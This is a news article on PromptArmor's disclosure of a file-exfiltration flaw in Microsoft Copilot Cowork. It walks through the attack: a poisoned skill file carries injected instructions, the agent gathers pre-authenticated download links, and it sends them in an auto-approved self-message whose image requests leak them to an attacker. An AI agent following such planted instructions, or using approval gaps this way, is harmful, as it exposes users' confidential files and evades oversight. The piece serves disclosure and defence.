Microsoft Copilot Cowork Can Silently Steal Your Files

Key Takeaways

• Copilot Cowork's automatic action approvals for self-messages create a file exfiltration pathway
• The attack achieved high success rates against state-of-the-art AI models including Claude Opus 4.7
• Users cannot currently disable the vulnerable auto-approval behavior

Microsoft Copilot Cowork, the company's newest AI agent for enterprise productivity, has a security hole that lets attackers steal sensitive files without any user interaction. Security firm PromptArmor discovered that the feature's action approval system doesn't require permission when the AI sends messages to the user themselves. This gap turns a helpful automation feature into a silent data siphon.

How the Attack Works

Copilot Cowork operates with your Microsoft 365 permissions. It can read files, send emails, and post Teams messages on your behalf. Microsoft's documentation claims the AI asks for permission before taking sensitive actions like sending emails or posting messages. In practice, that's not always true.

When Copilot sends a message to the active user (you, talking to yourself), it skips the approval step entirely. Users have no setting to change this behavior. The attack chain exploits this gap through indirect prompt injection.

Here's how it unfolds: An attacker creates a poisoned "skill" file containing hidden malicious instructions. When a victim uploads this file to Copilot Cowork (common for extending functionality), the injected prompt manipulates the AI's behavior. The compromised agent then retrieves pre-authenticated download links for sensitive files the user can access. These links allow anyone who opens them to download the files.

The agent embeds these links in a Teams message or email sent to the user. When the victim opens the message, external image elements trigger network requests that transmit the stolen download links to attacker-controlled servers. Zero clicks required beyond viewing the message.

“The fundamental issue is that LLMs cannot yet reliably distinguish between a user's trusted instructions and untrusted data found in files or websites.”

— Security Researcher, PromptArmor

High Success Rate Against Modern AI Models

PromptArmor tested this attack against current AI models. The results should concern any enterprise using agentic AI tools. Claude Opus 4.7, one of Anthropic's most capable models, proved vulnerable. The attack achieved consistent success across state-of-the-art systems.

The researchers note this isn't a bug in a specific AI model. It's a design problem with how agentic systems handle trust boundaries. When you give an AI agent broad permissions across an enterprise ecosystem, any weakness in one integrated system becomes an attack vector for the whole platform.

The Broader Agentic AI Risk

PromptArmor points out that each of Copilot Cowork's capabilities seems harmless in isolation. Reading files? Sending Teams messages? Both are normal productivity features. But combining these capabilities under a single AI agent that can be manipulated through prompt injection creates compound risks.

This mirrors earlier research by the same team showing how URL previews in communication apps became data exfiltration channels for AI agents. The pattern is consistent: AI systems that bridge multiple enterprise tools inherit the security weaknesses of all those tools.

PromptArmor disclosed a separate vulnerability to Microsoft that directly allows data egress from Copilot Cowork's sandbox environment. They're publishing this research to help enterprises understand the risks of current agentic products.

What Security Experts Are Saying

The disclosure sparked significant discussion in security communities. On Hacker News, commenters focused on the fundamental architecture problem: when AI agents receive broad read/write permissions, the lack of a secure trust boundary between data sources and tool execution becomes catastrophic.

Reddit's cybersecurity community expressed concern about Microsoft's security defaults in their Frontier program. Several professionals noted the exploit effectively turns productivity software into a silent data pipeline to attackers.

What Enterprises Should Do Now

The attack requires the victim to upload a poisoned skill file. Organizations should treat skill files like executable code. Don't upload files from untrusted sources. Review what files your Copilot Cowork instances have access to.

• Audit which users have Copilot Cowork enabled
• Review permissions granted to AI agents in your Microsoft 365 environment
• Establish policies for vetting skill files before upload
• Monitor for unusual Teams or email activity from AI agents
• Consider limiting Copilot Cowork access to sensitive SharePoint and OneDrive folders

Microsoft hasn't publicly commented on a timeline for addressing the auto-approval gap. Until then, the self-message loophole remains open.

Frequently Asked Questions

What is indirect prompt injection?

Indirect prompt injection embeds malicious instructions in content the AI processes (files, emails, web pages) rather than typing them directly. The AI follows these hidden instructions because it can't distinguish trusted commands from untrusted data.

Can I disable the auto-approval for self-messages?

No. Microsoft currently doesn't provide a setting to require approval when Copilot sends messages to the active user. This is the core gap enabling the attack.

Which files are at risk from this vulnerability?

Any files the user can access through SharePoint or OneDrive. Copilot can retrieve pre-authenticated download links for these files, which work for anyone who opens them.

Does this affect all Microsoft 365 customers?

Only organizations using Copilot Cowork, which is currently a Frontier feature. Standard Microsoft 365 Copilot may have different permission models.

Has Microsoft patched this vulnerability?

The auto-approval gap remains as of this disclosure. PromptArmor separately disclosed a sandbox escape vulnerability to Microsoft, which may be addressed separately.

Source: Hacker News: Best